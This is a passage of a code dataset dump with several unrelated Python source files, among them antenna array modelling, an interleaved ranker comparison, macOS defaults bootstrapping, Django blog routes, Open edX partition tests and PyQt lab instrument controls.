Tweets']=[clean_txt(row['Tweet'],\"@[\\w]*\") for _,row in data.iterrows()]\n data['SS']=get_sentiment(data)\n data['Date']=pd.to_datetime(data['Date'])\n return data\n","repo_name":"thedatanecdotes/project-search-bar","sub_path":"src/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74883619600","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 9 11:52:08 2020\r\n\r\n@author: drsmith\r\n\r\nClass: SystemArchitecture\r\n\r\nThe SystemArchitecture class creates objects that contain all aspects of the system, including the dipole layout\r\nand any feed structure.\r\n\r\n\"\"\"\r\n\r\nimport scipy as sc\r\nimport numpy as np\r\nimport scipy.constants\r\nfrom metaworks.ElementProperties import ElementProperties\r\n# from scipy import linalg\r\n\r\nclass SystemArchitecture:\r\n # The SystemArchitecture class defines an arbitrary dipole layout and feed structure. \r\n # Note that to keep consistent with the usual definitions of phi and theta, the antenna aperture is in the xz-plane\r\n # for 2D apertures, with y being the broadside direction. 
This means that the phi angle is in the xy plane,\r\n # as usually defined, with phi=90 degrees being the broadside direction and phi=0 being the positive x-axis.\r\n \r\n # Define a set of useful constants\r\n C = scipy.constants.c\r\n EPS_0 = scipy.constants.epsilon_0 #C^2/(N*m^2)\r\n MU_0 = scipy.constants.mu_0 #m kg s^-2 A^-2\r\n cm = 0.01\r\n GHz = 1.0E9\r\n \r\n # If no input parameters provided, use a default set.\r\n # For the default, assume the operating wavelength is 10 GHz.\r\n # The antenna is 1D, lambda/4 spacing of 31 elements (0.75 cm).\r\n \r\n freq_op_default = 10*GHz\r\n positions_x_default, dipoleSpacingX_default = np.linspace(0.0*cm, 22.5*cm, 31, retstep=True)\r\n positions_y_default = np.zeros(31)\r\n dipoleID_default = np.arange(31)\r\n alpha_default = np.ones(31)\r\n dipole_layout_default = np.vstack((dipoleID_default,positions_x_default,positions_y_default,alpha_default))\r\n \r\n # For the feed properties, what matters is the field at the position of each dipole.\r\n # The type of feed changes the calculation for the feed mode, with the field at each dipole finally saved.\r\n \r\n feed_type_default = 'plane wave'\r\n \r\n \r\n def __init__(self, freq_op: float = freq_op_default, feed_type: str = feed_type_default,\r\n dipole_layout: list = dipole_layout_default):\r\n\r\n self.freq_op = freq_op\r\n self.wavelength_op=self.C/self.freq_op\r\n self.dipoleID = dipole_layout[0,:]\r\n self.positions_x = dipole_layout[1,:]\r\n self.positions_y = dipole_layout[2,:] \r\n self.alpha = dipole_layout[3,:]\r\n self.dipoleLayout = dipole_layout\r\n self.numDipolesX = len(self.dipoleID)\r\n self.numDipolesY = 1\r\n self._dipoleType = 'ideal-unconstrained'\r\n self.dipoleProperties = ElementProperties()\r\n self.layoutType = 'linear 1D'\r\n self.apertureDimension = 1\r\n self.dipoleSpacingX= self.positions_x[1]-self.positions_x[0]\r\n self.dipoleSpacingY= None\r\n self.apertureSizeX= self.dipoleSpacingX * self.numDipolesX\r\n self.apertureSizeY= None\r\n self.modulationType = None\r\n \r\n #\r\n # Feed attributes\r\n self.feed_type = feed_type\r\n self._guideIndex = 2.5\r\n self.betaX = None\r\n self.betaY = None\r\n self.k0 = 2*sc.pi*self.freq_op/self.C\r\n self.nx = 1.0\r\n self.ny = 0.0\r\n self.hy = np.ones(self.numDipolesX)\r\n \r\n # Calculate the incident field distribution for the default feed structure:\r\n self.feed_architecture(feed_type = self.feed_type, set=True)\r\n\r\n# The following set of functions allow access to class properties, allowing validation of input and self-constinency when parameters are changed. 
\r\n\r\n @property\r\n def dipole_type(self):\r\n return self._dipoleType\r\n\r\n @dipole_type.setter\r\n def dipole_type(self, value):\r\n selection = None\r\n properties = ('ideal', 'ideal-unconstrained', 'ideal-magnitude-only', 'ideal-constrained-lorentzian',\r\n 'lorentzian-limited-tuning')\r\n if value == 'help':\r\n print('Supported dipole types are: ideal, ideal-unconstrained, ideal-magnitude-only, ideal-constrained-lorentzian')\r\n return\r\n else:\r\n for property in properties:\r\n if value == property:\r\n selection = value\r\n if selection != None:\r\n self._dipoleType = selection\r\n else:\r\n print(value + ' is not a supported type')\r\n if value == 'lorentzian-limited-tuning':\r\n self.dipoleProperties.set_lorentzian_dipole_parameters(tuning_frequency_low = 9.5*self.GHz, tuning_frequency_high=10.5*self.GHz,\r\n operating_frequency=self.freq_op)\r\n \r\n @property\r\n def guide_index(self):\r\n return self._guideIndex\r\n\r\n @guide_index.setter\r\n def guide_index(self, value):\r\n self._guideIndex = value\r\n if self.apertureDimension == 1:\r\n self.feed_architecture(feed_type = self.feed_type, set=True)\r\n else:\r\n self.feed_architecture_2D(feed_type=self.feed_type, set=True)\r\n\r\n def make_linear_array(self, spc, **kwargs):\r\n self.apertureDimension = 1\r\n apSize = kwargs.get('aperture_size')\r\n num = kwargs.get('number_elements')\r\n self.layoutType = 'linear 1D'\r\n if apSize == None:\r\n apSize = (num-1)*spc\r\n else:\r\n num = int(np.floor(apSize/spc)+1)\r\n self.dipoleSpacingX = spc\r\n self.apertureSizeX = apSize\r\n self.positions_x = np.linspace(0.0*self.cm, spc*(num-1), num)\r\n self.numDipolesX = num\r\n self.numDipolesY = 1\r\n self.dipoleID = np.arange(num)\r\n self.positions_y = np.zeros(num)\r\n self.alpha = np.ones(num)\r\n self.dipoleLayout= np.vstack((self.dipoleID, self.positions_x, self.positions_y, self.alpha))\r\n\r\n self.feed_architecture(self.feed_type, set=True)\r\n\r\n def make_linear_2D_array(self, spcx, spcy, **kwargs):\r\n self.apertureDimension=2\r\n self.layoutType = 'linear 2D'\r\n apSizeX = kwargs.get('aperture_size_x')\r\n numx = kwargs.get('number_elements_x')\r\n if apSizeX == None:\r\n apSizeX = (numx-1)*spcx\r\n else:\r\n numx = np.floor(apSizeX/spcx)+1\r\n apSizeY = kwargs.get('aperture_size_y')\r\n numy = kwargs.get('number_elements_y')\r\n if apSizeY == None:\r\n apSizeY = (numy-1)*spcy\r\n else:\r\n numy = np.floor(apSizeY/spcy)+1\r\n self.dipoleSpacingX = spcx\r\n self.dipoleSpacingY = spcy\r\n self.apertureSizeX = apSizeX\r\n self.apertureSizeY = apSizeY\r\n u, v = np.mgrid[0.0*self.cm:spcy*(numy-1):1j*numy,0.0*self.cm:spcx*(numx-1):1j*numx]\r\n self.positions_x = v.ravel()\r\n self.positions_y = u.ravel()\r\n self.numDipoles = numx*numy\r\n self.numDipolesX = numx\r\n self.numDipolesY = numy\r\n self.dipoleID = np.arange(self.numDipoles)\r\n self.alpha = np.ones(self.numDipoles)\r\n self.dipoleLayout= np.vstack((self.dipoleID, self.positions_x, self.positions_y, self.alpha))\r\n \r\n self.feed_architecture_2D(feed_type=self.feed_type, set=True)\r\n \r\n \r\n def summarize_parameters(self):\r\n print('Operating Frequency: ' + str(self.freq_op/self.GHz) + ' GHz')\r\n print('Operating Wavelength: ' + str(self.wavelength_op/self.cm) + ' cm')\r\n print('Dipole Type: ' + self._dipoleType)\r\n print('Layout Type: ' + self.layoutType)\r\n if self.apertureDimension == 1:\r\n print('Dipole Spacing: ' + str(self.dipoleSpacingX/self.cm) + ' cm')\r\n print('Aperture Size: ' + str(self.apertureSizeX/self.cm) + ' cm')\r\n print('Number 
of Dipoles: ' + str(self.numDipolesX))\r\n else:\r\n print('Dipole Spacing along x: ' + str(self.dipoleSpacingX/self.cm) + ' cm')\r\n print('Dipole Spacing along y: ' + str(self.dipoleSpacingY/self.cm) + ' cm')\r\n print('Aperture Size along x: ' + str(self.apertureSizeX/self.cm) + ' cm')\r\n print('Aperture Size along y: ' + str(self.apertureSizeY/self.cm) + ' cm')\r\n print('Number of Dipoles along x: ' + str(self.numDipolesX))\r\n print('Number of Dipoles along y: ' + str(self.numDipolesY)) \r\n print('Feed Type: ' + self.feed_type)\r\n print('Waveguide Index: ' + str(self.guide_index))\r\n print('Modulation Type: ' + str(self.modulationType))\r\n \r\n def feed_architecture(self, xpos=0, **kwargs):\r\n # Based on the feed type, select the appropriate function. The functions corresponding to different\r\n # feeds are specified below.\r\n \r\n def plane_wave(xpos=0, **kwargs):\r\n if kwargs.get('set') == True:\r\n self.betaX = (2*sc.pi*self.freq_op/self.C)*self.guide_index*self.nx\r\n self.hy = np.exp(-np.multiply(1j,self.betaX*self.positions_x))\r\n elif kwargs.get('sample') == True:\r\n return np.exp(-np.multiply(1j, np.multiply(self.betaX, xpos)))\r\n \r\n def microstrip():\r\n return self.freq * 1\r\n\r\n def rectangular_waveguide():\r\n return self.freq * .5\r\n\r\n choices = {\r\n 'plane wave': plane_wave,\r\n 'microstrip': microstrip,\r\n 'rectangular waveguide': rectangular_waveguide \r\n }\r\n \r\n if kwargs.get('feed_type') != None:\r\n feed_type = kwargs.get('feed_type')\r\n feed_func = choices.get(feed_type)\r\n else:\r\n feed_type = self.feed_type\r\n feed_func = choices.get(feed_type)\r\n if kwargs.get('set') == True:\r\n feed_func(set=True)\r\n elif kwargs.get('sample') == True:\r\n return feed_func(xpos, sample=True)\r\n \r\n def feed_architecture_2D(self, xpos=0, ypos=0, **kwargs):\r\n # Based on the feed type, select the appropriate function. 
The functions corresponding to different\r\n # feeds are specified below.\r\n \r\n def plane_wave_2D(xpos=0, ypos=0, **kwargs):\r\n if kwargs.get('set') == True:\r\n self.betaX = (2*sc.pi*self.freq_op/self.C)*self.guide_index*self.nx\r\n self.betaY = (2*sc.pi*self.freq_op/self.C)*self.guide_index*self.ny\r\n self.hy = np.multiply(np.exp(-np.multiply(1j,self.betaX*self.positions_x)), np.exp(-np.multiply(1j,self.betaY*self.positions_y)))\r\n elif kwargs.get('sample') == True:\r\n return np.multiply(np.exp(-np.multiply(1j,np.multiply(self.betaX,xpos))), np.exp(-np.multiply(1j,np.multiply(self.betaY, ypos))))\r\n \r\n def microstrip_2D():\r\n self.freq = self.freq_op #!!edited\r\n return self.freq * 1\r\n\r\n def rectangular_waveguide_2D():\r\n self.freq = self.freq_op #!!edited\r\n return self.freq * .5\r\n\r\n choices = {\r\n 'plane wave': plane_wave_2D,\r\n 'microstrip': microstrip_2D,\r\n 'rectangular waveguide': rectangular_waveguide_2D \r\n }\r\n \r\n if kwargs.get('feed_type') != None:\r\n feed_type = kwargs.get('feed_type')\r\n feed_func = choices.get(feed_type)\r\n else:\r\n feed_type = self.feed_type\r\n feed_func = choices.get(feed_type)\r\n if kwargs.get('set')==True:\r\n feed_func(set=True)\r\n elif kwargs.get('sample') == True:\r\n return feed_func(xpos, ypos, sample=True) \r\n\r\n \r\n","repo_name":"drsmith706/metaworks_pub","sub_path":"metaworks/SystemArchitecture.py","file_name":"SystemArchitecture.py","file_ext":"py","file_size_in_byte":11533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"198369236","text":"# This file is part of Lerot.\n#\n# Lerot is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Lerot is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with Lerot. 
If not, see .\n\n# KH, 2012/06/19\n\nimport argparse\n\nfrom numpy import asarray, e, log, where, exp\nfrom random import randint\n\nfrom .AbstractInterleavedComparison import AbstractInterleavedComparison\nfrom ..utils import split_arg_str\n\n\nclass ProbabilisticInterleave(AbstractInterleavedComparison):\n \"\"\"Probabilistic interleaving, marginalizes over assignments\"\"\"\n\n def __init__(self, arg_str=None):\n if arg_str:\n parser = argparse.ArgumentParser(description=\"Parse arguments for \"\n \"interleaving method.\", prog=self.__class__.__name__)\n parser.add_argument(\"-a\", \"--aggregate\", choices=[\"expectation\",\n \"log-likelihood-ratio\", \"likelihood-ratio\", \"log-ratio\",\n \"binary\"])\n parser.add_argument(\"-d\", \"--det_interleave\", type=bool,\n help=\"If true, use deterministic interleaving, regardless \"\n \"of the ranker type used for comparison.\")\n parser.add_argument(\"-t\", \"--compare_td\", type=bool,\n help=\"If true, compare rankers using observed assignments \"\n \"instead of marginalizing over possible assignments.\")\n args = vars(parser.parse_known_args(split_arg_str(arg_str))[0])\n if \"aggregate\" in args and args[\"aggregate\"]:\n self.aggregate = args[\"aggregate\"]\n if \"det_interleave\" in args and args[\"det_interleave\"]:\n self.det_interleave = True\n if \"compare_td\" in args and args[\"compare_td\"]:\n self.compare_td = True\n if not hasattr(self, \"aggregate\") or not self.aggregate:\n self.aggregate = \"expectation\"\n if not hasattr(self, \"det_interleave\"):\n self.det_interleave = False\n if not hasattr(self, \"compare_td\"):\n self.compare_td = False\n\n def interleave(self, r1, r2, query, length):\n r1.init_ranking(query)\n r2.init_ranking(query)\n length = min(r1.document_count(), r2.document_count(), length)\n # start with empty document list\n l = []\n # random bits indicate which r to use at each rank\n a = asarray([randint(0, 1) for _ in range(length)])\n for next_a in a:\n # flip coin - which r contributes doc (pre-computed in a)\n select = r1 if (next_a == 0) else r2\n other = r2 if (next_a == 0) else r1\n # draw doc\n if self.det_interleave:\n pick = select.next_det()\n else:\n pick = select.next()\n l.append(pick)\n # let other ranker know that we removed this document\n try:\n other.rm_document(pick)\n except:\n pass\n return (asarray(l), (a, r1, r2))\n\n def infer_outcome(self, l, a, c, query):\n (td_a, r1, r2) = a\n\n # for comparisons with TD, use naive comparison\n if self.compare_td:\n c1 = sum([1 if val_a == 0 and val_c == 1 else 0\n for val_a, val_c in zip(td_a, c)])\n c2 = sum([1 if val_a == 1 and val_c == 1 else 0\n for val_a, val_c in zip(td_a, c)])\n return -1 if c1 > c2 else 1 if c2 > c1 else 0\n\n # comparison with marginalization\n # are there any clicks? 
(otherwise it's a tie)\n click_ids = where(asarray(c) == 1)\n if not len(click_ids[0]): # no clicks, will be a tie\n return 0, 0\n\n r1.init_ranking(query)\n r2.init_ranking(query)\n\n # enumerate all possible assignments that go with l, add their\n # outcomes weighted by probabilities\n # original outcome is not needed in this case, only clicks and probs\n root = SimpleBinaryTree(None, 0.0, 0) # root\n nextLevel = [root]\n currentLevel = []\n\n # traverse possible assignments breath-first\n log_p_a = len(l) * log(0.5)\n log_p_l = len(l) * log(0.5)\n\n for n in range(len(l)):\n currentLevel = nextLevel\n nextLevel = []\n p_r1 = r1.get_document_probability(l[n])\n p_r2 = r2.get_document_probability(l[n])\n # zero probability: observed list is not possible (e.g., with\n # deterministic rankers and historical data)\n if p_r1 == 0 and p_r2 == 0:\n return .0\n r1.rm_document(l[n])\n try:\n r2.rm_document(l[n])\n except:\n pass\n log_p_l += log(p_r1 + p_r2)\n\n for node in currentLevel:\n # expand children and add new nodes to queue for nextLevel\n # left child: r1 is selected, only expand if p > 0\n if p_r1 > 0:\n p_left = node.prob + log(0.5 * p_r1)\n o_left = node.outcome\n if c[n] == 1:\n o_left += -1\n node.left = SimpleBinaryTree(node, p_left, o_left)\n nextLevel.append(node.left)\n # right child: r2 is selected, only expand if p > 0\n if p_r2 > 0:\n p_right = node.prob + log(0.5 * p_r2)\n o_right = node.outcome\n if c[n] == 1:\n o_right += 1\n node.right = SimpleBinaryTree(node, p_right, o_right)\n nextLevel.append(node.right)\n # we have all log probabilities for outcomes =! 0\n o1 = 0.0\n o2 = 0.0\n for node in nextLevel:\n if node.outcome != 0:\n # log_p_a and log_p_l cancel out if we turn the outcome into a\n # ratio for now, keep them for clarity\n if node.outcome < 0:\n o1 += e ** (node.prob + log_p_a - log_p_l)\n else:\n o2 += e ** (node.prob + log_p_a - log_p_l)\n\n # return -1 if o1 > o2 else 1 if o2 > o1 else 0\n if o1 == o2:\n outcome = 0\n elif self.aggregate == \"expectation\":\n outcome = o2 - o1\n elif self.aggregate == \"log-likelihood-ratio\":\n if o1 > o2:\n outcome = log(o2 / o1)\n else:\n outcome = log(o1 / o2)\n elif self.aggregate == \"likelihood-ratio\":\n if o1 > o2:\n outcome = (float(o2) / o1) - 1\n else:\n outcome = 1 - (float(o1) / o2)\n elif self.aggregate == \"log-ratio\":\n if o1 > o2:\n outcome = float(log(o1)) / log(o2) - 1\n else:\n outcome = 1 - float(log(o2)) / log(o1)\n elif self.aggregate == \"binary\":\n outcome = -1 if o1 > o2 else 1 if o2 > o1 else 0\n else:\n raise ValueError(\"Unknown aggregation method: %s\", self.aggregate)\n return outcome, exp(log_p_l)\n\n def get_probability_of_list(self, result_list, context, query):\n # P(l) = \\prod_{doc in result_list} 1/2 P_1(doc) + 1/2 P_2(doc)\n p_l = 1.0\n (_, r1, r2) = context\n r1.init_ranking(query)\n r2.init_ranking(query)\n for _, doc in enumerate(result_list):\n p_r1 = r1.get_document_probability(doc)\n p_r2 = r2.get_document_probability(doc)\n r1.rm_document(doc)\n r2.rm_document(doc)\n p_l *= 0.5 * (p_r1 + p_r2)\n return p_l\n\n\nclass SimpleBinaryTree:\n \"\"\"tree that keeps track of outcome, probability of arriving at this\n outcome\"\"\"\n parent, left, right, prob, outcome = None, None, None, 0.0, 0\n\n def __init__(self, parent, prob, outcome):\n self.parent = parent\n self.prob = prob\n self.outcome = 
outcome\n","repo_name":"redreamality/learning-to-rank","sub_path":"lerot/comparison/ProbabilisticInterleave.py","file_name":"ProbabilisticInterleave.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"7049401116","text":"from .action import *\nfrom . import path, tools\n\ndefault_paths = path.configfiles(\"defaults/*\")\n\ndef get_file_arguments(plist_buddy, files):\n import shlex\n for file in files:\n with open(file, \"rt\") as buddy_file:\n first_line = buddy_file.readline()\n if not first_line.startswith(\"#!\"):\n continue\n first_line = first_line[2:]\n parts = shlex.split(first_line)\n while parts and \"plist-buddy\" not in parts[0]:\n del parts[0]\n if not parts:\n continue\n # parts[0] is now the plist-buddy call. Replace it with the given path\n parts[0] = plist_buddy\n parts.append(file)\n yield parts\n\ndef get_default_files(default_paths):\n from glob import glob\n \n files = []\n for default_path in path.expandusers(default_paths):\n files += glob(default_path)\n \n files.sort(key=path.basename)\n return files\n\n@default\n@action(\n default_paths=argument(\n help=\"the paths used for default files, with possible glob characters\",\n metavar=\"file\"\n )\n)\ndef apply_defaults(default_paths=default_paths):\n \"\"\"\n Applies defaults using plist-buddy. The defaults files are sorted alphabetically for the filename if necessary.\n \"\"\"\n plist_buddy = path.join(path.scriptdir, 'bin', 'plist-buddy')\n files = get_default_files(default_paths)\n for command in get_file_arguments(path.join(path.scriptdir, 'bin', 'plist-buddy'), files):\n print(\"Applying defaults from {}\".format(command[-1]))\n tools.run(*command)\n","repo_name":"nd-net/bootstrap","sub_path":"bootstrap_impl/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26570973290","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'blog'\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('/', views.detail_article, name='detail'),\n path('create/', views.create_view, name='create'),\n path('create/blog/', views.create_action, name='create_action'),\n path('/comment/', views.comment, name='comment'),\n path('register/', views.register, name='register')\n]\n","repo_name":"jingyu722/DjangoBlog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12615444213","text":"\"\"\"\nTest the user api's partition extensions.\n\"\"\"\n\n\nfrom collections import defaultdict\nfrom unittest.mock import patch\n\nimport pytest\nfrom django.test import TestCase\n\nfrom openedx.core.djangoapps.user_api.partition_schemes import RandomUserPartitionScheme, UserPartitionError\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom xmodule.partitions.partitions import Group, UserPartition # lint-amnesty, pylint: disable=wrong-import-order\nfrom xmodule.partitions.tests.test_partitions import PartitionTestCase # lint-amnesty, pylint: disable=wrong-import-order\n\n\nclass MemoryCourseTagAPI:\n \"\"\"\n An implementation of a user service that uses an in-memory dictionary for storage\n \"\"\"\n def __init__(self):\n self._tags = defaultdict(dict)\n\n def get_course_tag(self, __, course_id, key):\n \"\"\"Sets the value of ``key`` to ``value``\"\"\"\n return self._tags[course_id].get(key)\n\n def set_course_tag(self, __, course_id, key, value):\n \"\"\"Gets the value of ``key``\"\"\"\n self._tags[course_id][key] = value\n\n class BulkCourseTags:\n @classmethod\n def is_prefetched(self, course_id): # lint-amnesty, pylint: disable=bad-classmethod-argument, unused-argument\n return False\n\n\n@pytest.mark.django_db\nclass TestRandomUserPartitionScheme(PartitionTestCase):\n \"\"\"\n Test getting a user's group out of a partition\n \"\"\"\n\n MOCK_COURSE_ID = \"mock-course-id\"\n\n def setUp(self):\n super().setUp()\n # Patch in a memory-based user service instead of using the persistent version\n course_tag_api = MemoryCourseTagAPI()\n self.user_service_patcher = patch(\n 'openedx.core.djangoapps.user_api.partition_schemes.course_tag_api', course_tag_api\n )\n self.user_service_patcher.start()\n self.addCleanup(self.user_service_patcher.stop)\n\n # Create a test user\n self.user = UserFactory.create()\n\n def test_get_group_for_user(self):\n # get a group assigned to the user\n group1_id = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, self.user_partition)\n\n # make sure we get the same group back out every time\n for __ in range(10):\n group2_id = RandomUserPartitionScheme.get_group_for_user(\n self.MOCK_COURSE_ID,\n self.user,\n self.user_partition\n )\n assert group1_id == group2_id\n\n def test_get_group_for_user_with_assign(self):\n \"\"\"\n Make sure get_group_for_user returns None if no group is already\n assigned to a user instead of assigning/creating a group automatically\n \"\"\"\n # We should not get any group because assign is False which will\n # protect us from automatically creating a group for user\n group = RandomUserPartitionScheme.get_group_for_user(\n self.MOCK_COURSE_ID, self.user, self.user_partition, assign=False\n )\n\n assert group is None\n\n # We should get a group automatically assigned to user\n group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, 
self.user_partition)\n\n assert group is not None\n\n def test_empty_partition(self):\n empty_partition = UserPartition(\n self.TEST_ID,\n 'Test Partition',\n 'for testing purposes',\n [],\n scheme=RandomUserPartitionScheme\n )\n # get a group assigned to the user\n with self.assertRaisesRegex(UserPartitionError, \"Cannot assign user to an empty user partition\"):\n RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, empty_partition)\n\n def test_user_in_deleted_group(self):\n # get a group assigned to the user - should be group 0 or 1\n old_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, self.user_partition)\n assert old_group.id in [0, 1]\n\n # Change the group definitions! No more group 0 or 1\n groups = [Group(3, 'Group 3'), Group(4, 'Group 4')]\n user_partition = UserPartition(self.TEST_ID, 'Test Partition', 'for testing purposes', groups)\n\n # Now, get a new group using the same call - should be 3 or 4\n new_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, user_partition)\n assert new_group.id in [3, 4]\n\n # We should get the same group over multiple calls\n new_group_2 = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, user_partition)\n assert new_group == new_group_2\n\n def test_change_group_name(self):\n # Changing the name of the group shouldn't affect anything\n # get a group assigned to the user - should be group 0 or 1\n old_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, self.user_partition)\n assert old_group.id in [0, 1]\n\n # Change the group names\n groups = [Group(0, 'Group 0'), Group(1, 'Group 1')]\n user_partition = UserPartition(\n self.TEST_ID,\n 'Test Partition',\n 'for testing purposes',\n groups,\n scheme=RandomUserPartitionScheme\n )\n\n # Now, get a new group using the same call\n new_group = RandomUserPartitionScheme.get_group_for_user(self.MOCK_COURSE_ID, self.user, user_partition)\n assert old_group.id == new_group.id\n\n\nclass TestExtension(TestCase):\n \"\"\"\n Ensure that the scheme extension is correctly plugged in (via entry point\n in setup.py)\n \"\"\"\n\n def test_get_scheme(self):\n assert UserPartition.get_scheme('random') == RandomUserPartitionScheme\n with self.assertRaisesRegex(UserPartitionError, 'Unrecognized scheme'):\n UserPartition.get_scheme('other')\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/user_api/tests/test_partition_schemes.py","file_name":"test_partition_schemes.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"73436763602","text":"from instruments.OceanOptics.spectrometer import QSpectrometer\r\nfrom PyQt5.QtCore import QThread, QTimer, QObject, pyqtSignal, pyqtSlot\r\nfrom PyQt5 import QtWidgets\r\nimport instruments.CAEN as CAENlib\r\nfrom instruments.Thorlabs.shuttercontrollers import QShutterControl\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nimport sys\r\nimport numpy as np\r\nimport time\r\nfrom matplotlib import pyplot as plt\r\nimport random\r\nimport logging\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n\r\nclass Spectrometer(QSpectrometer):\r\n\r\n measurement_complete_result = pyqtSignal(np.ndarray)\r\n measurement_complete_signal = pyqtSignal()\r\n measurement_complete_dark_result = pyqtSignal(np.ndarray)\r\n measurement_complete_dark_signal = pyqtSignal()\r\n\r\n def 
__init__(self):\r\n super().__init__()\r\n\r\n @pyqtSlot()\r\n def measure_spectrum(self):\r\n spectrum, _ = self.measure()\r\n self.measurement_complete_result.emit(spectrum)\r\n self.measurement_complete_signal.emit()\r\n\r\n @pyqtSlot()\r\n def measure_dark_spectrum(self):\r\n darkspectrum, _ = self.measure_dark()\r\n self.measurement_complete_dark_result.emit(darkspectrum)\r\n self.measurement_complete_dark_signal.emit()\r\n logging.info('Took darkspectrum')\r\n\r\n @pyqtSlot(int)\r\n def set_integration_time(self, number_of_pulses):\r\n # frequency of laser is 101 Hz, integration time is in ms\r\n integration_time = 1000 / 101 * number_of_pulses\r\n self.integrationtime = integration_time\r\n\r\n\r\nclass Digitizer(CAENlib.Digitizer):\r\n # subclussing digitizer to add some additional signals\r\n measurement_complete_single_result = pyqtSignal(np.ndarray)\r\n measurement_complete_single_signal = pyqtSignal()\r\n measurement_complete_multiple_result = pyqtSignal(np.ndarray)\r\n measurement_complete_multiple_signal = pyqtSignal()\r\n\r\n def __init__(self, digitizer_handle=CAENlib.list_available_devices()[0]):\r\n CAENlib.Digitizer.__init__(self, digitizer_handle)\r\n self.number_of_pulses = 30\r\n\r\n @pyqtSlot()\r\n def measure_digi(self):\r\n # subtracts average of first 50 samples, inverts data\r\n data = self.measure()[list(self.active_channels)][0][0]\r\n data = -(data - np.mean(data[0:50]))\r\n return data\r\n\r\n @pyqtSlot()\r\n def measure_digi_emit(self):\r\n data = self.measure_digi()\r\n self.measurement_complete_single_result.emit(data)\r\n self.measurement_complete_single_signal.emit()\r\n return data\r\n\r\n @pyqtSlot()\r\n def measure_multiple_digi(self):\r\n data = []\r\n for i in range(self.number_of_pulses):\r\n if i == 0:\r\n data = self.measure_digi()\r\n else:\r\n data = np.vstack((data, self.measure_digi()))\r\n self.measurement_complete_multiple_result.emit(data)\r\n self.measurement_complete_multiple_signal.emit()\r\n return data\r\n\r\n\r\nclass MultipleSignal(QObject):\r\n\r\n measurements_done = pyqtSignal()\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.sp_done = False\r\n self.digi_done = False\r\n\r\n @pyqtSlot()\r\n def set_sp_done(self):\r\n self.sp_done = True\r\n self.check_measurements_done()\r\n\r\n @pyqtSlot()\r\n def set_digi_done(self):\r\n self.digi_done = True\r\n self.check_measurements_done()\r\n\r\n @pyqtSlot()\r\n def check_measurements_done(self):\r\n if self.sp_done and self.digi_done:\r\n self.measurements_done.emit()\r\n self.sp_done = False\r\n self.digi_done = False\r\n logging.info('both signals done, emitted global done')\r\n\r\n @pyqtSlot()\r\n def reset(self):\r\n self.sp_done = False\r\n self.digi_done = False\r\n\r\n\r\nclass PlotWindow(QtWidgets.QWidget):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.figure, self.ax = plt.subplots()\r\n self.canvas = FigureCanvas(self.figure)\r\n self.layout = QtWidgets.QVBoxLayout()\r\n self.layout.setContentsMargins(0, 0, 0, 0)\r\n self.layout.addWidget(self.canvas)\r\n\r\n @pyqtSlot(np.ndarray)\r\n def plot(self, ratio):\r\n self.ax.clear()\r\n self.ax.plot(ratio)\r\n self.ax.set_xlabel('Measurement number')\r\n self.ax.set_ylabel('Normalized ratio spectropower to laserpower')\r\n self.ax.set_title('Integrated spectrometer power relative to last measurement')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n @pyqtSlot(np.ndarray)\r\n def plot_spectrum(self, spectrum):\r\n self.ax.clear()\r\n self.ax.plot(spectrum)\r\n 
